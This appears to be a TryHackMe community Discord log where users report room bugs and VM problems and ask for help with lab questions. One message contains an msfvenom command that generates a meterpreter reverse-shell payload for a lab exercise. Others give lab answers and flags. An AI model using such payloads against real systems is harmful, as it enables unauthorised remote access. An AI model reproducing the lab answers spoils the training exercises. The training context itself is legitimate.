I only started VM from there i tried all commands till T4-Q2+Q3 nothing had worked correctly (again may be my mistake). Thank you Marry Christmas.
Room: Cybersecurity 101, Windows Powershell, Task 6.
The user it wanted me to enter, and the subsequent questions, were not on my target machine.
I had to look it up online to find it was looking for a user that didn't exist and sadly use their answers to progress.
The user I did have instead was "strategos"
Not sure why this happened, did my previous session fail to terminate, and it carried over a persistent session?
Just had a chance to check this one and was able to spin up the target machine in ~2 to 3 minutes.
@unborn pulsar, I pmd you, you might not see it since we aren't friends on discord but its in regards to my question above. I just wanted to check in with you on something if you can find the time. Thank you, if you can't I completely understand. I don't want to spoil a room here.
Gave +1 Rep to @unborn pulsar (current: #12 - 726)
Oh.. Haven't done that room yet.. π
Fair enough.
Tried it just now and it seems to work on my end -
Very minor, but in Task 3 of Supply Chain Attack: Lottie (https://tryhackme.com/r/room/supplychainattacks), the malicious replacement code for index.js was copied twice into the terminal-container. I'm not a JS expert, though, so if there is some deep magic reason for this, let me know.
It worked after termination of the previous instance then just starting it again. Forgot to update here
Recently for the past 2 days the target machines on a lot of rooms are going down quite alot it comes back up but still it's quite irritating that it goes down for a few minutes during the process so I've to start again
Missing a space in Task 1 of the Tutorial room
no present port 6667 or service name irc in Task 5 in Nmap Basic Port Scans
few formatting issues causing several bulleted items having small text,
https://tryhackme.com/r/room/networkminer
this should prob be updated too,
Tcpdump (available soon!)
Tshark (available soon!)
This room has multiple machines , you're probably using the wrong one π . Terminate your current machine and start one from the Task 5
oh okok
Nmap Post Port Scan | Task 2
Missing space in between
There should be space in the answer π
No, in the question.
Ah , yeah , you're right . My bad , sorry π
Hey everyone! Has anyone tried SOC Simulator I am having some issues with finding the logs in splunk for the alert. The date of the alert is 27/12/2024 there is no logs for this date. I can only see logs of the date 1/8/24 and yes date is set to All time
Can you describe the help that you need so we can point you to the right direction?
I am stuck on a question
What does BitDefenderFalx detect the file with the hash 2de70ca737c1f4602517c555ddd54165432cf231ffc0e21fb2e23b9dd14e7fb4 as?
on the room Search Skills
Love the new dark theme, but in commonlinuxprivesc I found a spot where some spans have an inline color style setting them black which makes it hard to see for dark theme, under Task 5 (eta: tasks 6, 8(one of the questions) and 9, also appear to have inline styles for the text color)
Day 8 of AOC gave me a Windows instead of Linux after I zoom in
I think it paired me to the wrong machine on full screen mode
You can switch between machine on a split-screen view menu
I see what is happening now: Iβm supposed to use the two boxes at the same time
Yes π
Alright thanks
Not Able to submit the solution
@quaint sparrow bro not working π₯²
Which room is this ?
Breaking RSA
That's not the right answer π
The answer should be 253 not 63 π₯²
No, the answer is 63.
No , it's 63 . FQDN can't exceed 253 including 63 chars from subdomain π
^
maximum length? why does the para says 253
It's for FQDN π
am learnnninnng from THM idk much
whats that? please explain noob here
FQDN - Fully Qualified Domain Name , that's the whole thing π . For ex shop.tryhackme.com subdomain+SLD+TLD π
subdomain in this case is shop and it can't exceed 63 char. FQDN is shop.tryhackme.com and it can't exceed 253 chars π
Maybe this can help π
Follow along for free at https://TryHackMe.com/room/dnsindetail
Task Timestamps:
0:00:00 - Video Overview
0:00:16 - Task 1: What is DNS?
0:01:39 - Task 2: Domain Hierarchy
0:05:18 - Task 3: Record Types
0:09:12 - Task 4: Making a Request
0:12:43 - Task 5: Practical
TryHackMe Official Discord: https://discord.gg/tryhackme
TryHackMe Official Sub...
aight will check
thanks again
Gave +1 Rep to @spare mirage (current: #5 - 1636)
Room: Ice
Metasploit (in Attackbox) does not have a default payload set for this exploit so the room is missing a set payload step. Seems like it's an issue for some versions of Metasploit?
Metasploit: Exploitation, Msfvenom, Get a meterpreter session on the target machine.
root@ip-10-10-x-x/# ./rev_shell.elf
Segmentation fault (core dumped)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.13.x.x LPORT=8008 -f elf > rev_shell.elf
I am not sure if this is from me, or not. Any ideas?
Well, it was me.....
Linux Fundamentals Part 2 task 4 the pro tip is all white in dark mode and we are unable to see the text
https://tryhackme.com/r/room/networkingcoreprotocols
Task 4 has no machine IP for me
Works fine for me π¦ . Which issue do you encounter ?
You need to press green "Start machine" button in Task 1 first π
sorry, problem on my side
Ok , glad to hear that you resolved it π
not yet lol
LOL thanks
Gave +1 Rep to @spare mirage (current: #5 - 1647)
I have no idea why, but if I finish using attack box in 30ish mins, terminate it, I cannot use it anymore on other aoc days. It is so weird.
If you aren't premium user you can only start it once per day π¦
Fairπ«
SOC Level 2 > Caldera
Target Machine VM has issues opening details on the Aurora events in the Event Viewer
https://tryhackme.com/r/room/networkingcoreprotocols
Tasks that use bullet points aren't consistent. Some end with a period, some don't.
Task 6's last item is missing a word: ". is sent on a line by itself to indicate the end of the"
https://tryhackme.com/r/room/wiresharkthebasics
Using dark mode some text isn't visible in the second task (works fine w lightmode)
Hello there, I found an annoying bug in this walkthrough section "https://tryhackme.com/r/room/searchskills" the issue was in task 4 where it asked "What is the top country with lighthttpd servers" I was supposed to use Shodan.io, however shodan says the top country using lighttpd servers is germany. The answer to this task was the United States, I had to de a search on previous peoples results to get through this task.
It shows πΊπΈ for me π
You probably typed lighthttpd instead of lighttpd
... Im an idiot, thanks for clearing that up π«
No , you aren't , don't say that . Typos happen to everybody π
Yeah, its an issue im trying to solve... i read to quickly and habitually skim read... my brain makes up things when I do this...
i remember i did this room.
i see in content ans is 63 and i did it but if u see this question now i forget . that i and mostly people just copy pasting . π
I am having issue with the "Sysinternals" lab
The "Turn On Network Discovery" was selected and "Save Changes" was clicked, however when I open it up to check that it still does turn on.
It keeps setting it to "Turn off network discovery". There is no way for me to complete the lab without having this feature solved.
Open it as admin.
I am already logged in automatically as Administrator. I have ran my powershell commands in powershell as an Administrator too.
It still doesnt change even selecting "Turn on network discovery" and saving the changes in powershell with Administrator rights
Was any hardening policy enforced that is causing this behaviour in the lab?
I even ran PS cmd manually to set it but it still does not work.
Found some copy-paste redundant text in room https://tryhackme.com/r/room/solar
First Task 'CVE-2021-44228 Introduction'
"""
This vulnerability [...] offers remote code trivial remote code execution on hosts [...]
"""
Similar thing in room https://tryhackme.com/r/room/windowsforensics1 task 7 'Usage or knowledge of files/folders'
Part 'Offoce Recent Files:'
"""
[...] In such a scenario, the recent files can be found at the following location.
NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU
In such a scenario, the recent files can be found at the following location.
[...]
"""
dark issue in room fileinc
Hello, I am in the room Enumeration & Brute Force, and the url http://enum.thm/labs/verbose_login/ to complete the task 3 does not seem to work. Any idea if the link is still valid ? Thank you !
Hello, I resolve the first task in this room https://tryhackme.com/r/room/ctf, but I received 0 points. Any idea why my task was not validated?
If I am not totally wrong you only are awarded points for questions that require an answer and not those you can just click
I did the same room tonight and recognized it as well... it awarded me only 60 points
I saw that other players was awarded
Yes, I recognized that as well... my guess was that they either changed it or the points are only awarded when the room is new
Ok, I understand. Thank you. Happy New Year
I didn't do the room but it seems that it's a room within the spawned machine and not on the internet
Yes I forgot to add the ip and domain in the /etc/host thanks :)
Gave +1 Rep to @proper root (current: #2532 - 1)
hi
i can't submit my answer in this question for red team path , password attacks room :
What syntax would you use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?
answer :
Azβ[0β9][0β9]β ^[!@]
Dark Mode Issue in Wireshark Basics Room, Task 2. First table is fine, but the second table renders like so.
you are using the wrong type of quotes... try replacing it with "
even the answer format is not like my answer
||Az"[0-9][0-9]" ^[!@]||
Like @rugged canyon said your formatting is wrong π
Refresh the page before pasting
thank you ! it worked
which task and question are you trying to answer???
i can't believe this π€£
You need to look out for formatting π
using the right quotes is important for commands
Try to use English/US layout for answers π
this is my double quotes from my keyboard in english why this happening ?
Which layout are you using ?
English/US
like what you said
i don't know really why this happened but thank you very much π Love and respect to this community β€οΈ
Anyway , pay attention to quotes next time β insn't the same as " π
Happy hacking π
Possible bug with the "File Inclusion" room. Lab3. Typing lab3 in the text field appears to create an endless loop and exhausts the resources of the server.
Hello i get a "Parsing Error" on Day 4 in Advent of Cyber 2024 when i try to start the Machine, if i reload the page everything seems to be working but then i get a Connection Error
Anyone had the same Problems and know how to fix this?
Probably a congestion on THM side π¦ , wait a little , refresh the page and try again in few minutes
Already waited 2 hours :E
Having issues with the extending your network room, I completed the network simulator and got the flag but when i enter the flag into the question it tells me that the input is too short. Iβve tried refreshing, logging in and out, even tried a couple times over the past couple weeks
What's your answer ?
THM{Youβve_got_data}
Fills up all the
Available spaces and ive tried caps vs. no caps
Your formatting may be wrong , refresh the page and copy this || THM{YOU'VE_GOT_DATA} ||
Still not working
It just went through, thanks a ton. This has been annoying me for weeks
Glad to hear that , keep going π
I got some sort of parsing error when trying to start a machine.. now I cant start it because I get this error, and it doesnt appear any are running that i can terminate!
"Oh no, an error occured while starting VM: You already have a machine running in this room. Terminate it before deploying another machine."
Terminate that instance , refresh the page , wait a few minutes and try again . There's probably a congestion on THM side π¦
Hello,
in the MAL: Strings the answer to the question
List the number of total transactions that the Bitcoin wallet used by the "Wannacry" author(s)
is no longer correct. There seem to have been 2 more transactions in the last two month
Minor bug: In dark mode, the room "File Inclusion" shows some unreadable text paragraphs unless marking them.
having the same issue, this doesnt resolve it
This field does not exist in the database given (The 'category' field), there isn't a question around it, it's just in the explanation part, but I am not sure if that was intentional or not.
Also, I just read back just to make sure, never had you make this field. Just thought I would point that out.
Room is "SQL Fundamentals" Task 7
Thanks, will ask the team to check this.
Gave +1 Rep to @short pebble (current: #627 - 8)
Thanks. Placed on the list to fix.
Thanks. Logged with team to fix.
Gave +1 Rep to @mellow citrus (current: #2536 - 1)
Thanks, On the backlog to fix.
Same Problem since yesterday nothing changed
dang i thought i was the only one
im having no vms running but still it says i have an error
The VM seems to be running after a reload but i cant connect to it
The VM issues you see @clear talon @kind grail are being investigated by the platform team. Don't have much info on what it is yet. Sorry for the hassle.
No problem. Please let us know once its fixed. Ive already sent a ticket as well
@clear talon @kind grail Can you try now?
I am having this problem still
same
@clear talon @agile rampart Try now, may need to terminate any running vms and start new vm. Seems like it was a capacity issue on last day of AoC.
Thanks it's working now
Gave +1 Rep to @wraith obsidian (current: #764 - 6)
In the room https://tryhackme.com/r/room/activerecon, Task 3, the last question tells you to run this command "ping -c 10 10.10.153.106" and asks how many ping replies did you get back?
The answer format is **
The answer format and "-c 10" gives away the answer without having to run the command.
I understand that sometimes Questions are straight forward, but for someone learning the first time, the -c should be more than 10 so it invites the learner to run the command to get the answer.

